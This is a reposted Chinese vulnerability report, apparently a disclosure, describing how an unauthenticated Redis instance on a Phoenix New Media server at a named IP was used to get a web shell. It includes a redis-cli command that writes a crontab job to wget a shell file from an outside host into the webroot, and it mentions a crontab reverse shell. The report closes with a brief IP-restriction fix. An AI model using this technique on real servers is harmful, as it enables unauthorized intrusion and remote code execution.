频道栏目
首页 > 安全 > 网站安全 > 正文
凤凰网某站点redis未授权访问导致Getshell
2016-01-29 09:18:39         来源:小不点  
收藏   我要投稿

向猪猪侠大牛学习

https://61.155.167.220:843/
 

QQ图片20151214211432.png





61.155.167.220 redis端口221虽然改了端口 不过还是未授权访问
 

QQ图片20151214211924.jpg


https://61.155.167.220/test.php 暴露了路径
 

QQ图片20151214212035.png



试了下一般的getshell方法,由于redis缓存问题shell无法执行

又不想flushall破坏数据

学习了下猪猪侠大牛的思路https://zone.wooyun.org/content/23858写crontab

echo -e "\n\n* * * * * wget https://***.***.***.***/shell.txt -O /data/media/xiao.php\n\n"|redis-cli -h 61.155.167.220 -p 221 -x set %
 

QQ图片20151214213607.png

 

QQ图片20151214175141.jpg



https://61.155.167.220/xiao.php
 

QQ图片20151214213910.png


QQ图片20151214213910.png

 

QQ图片20151214214456.png


试了下crontab反弹shell,写入成功,请删除
 

QQ图片20151214214043.png


看有人说redis写文件乱码可以远程加载

解决方案:

设置ip访问限制。

点击复制链接 与好友分享!回本站首页
相关TAG标签 凤凰网 站点
上一篇:中国人才热线某漏洞涉及800多万用户信息(含密码)
下一篇:某p2p配置不当泄漏用户密码(明文)
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站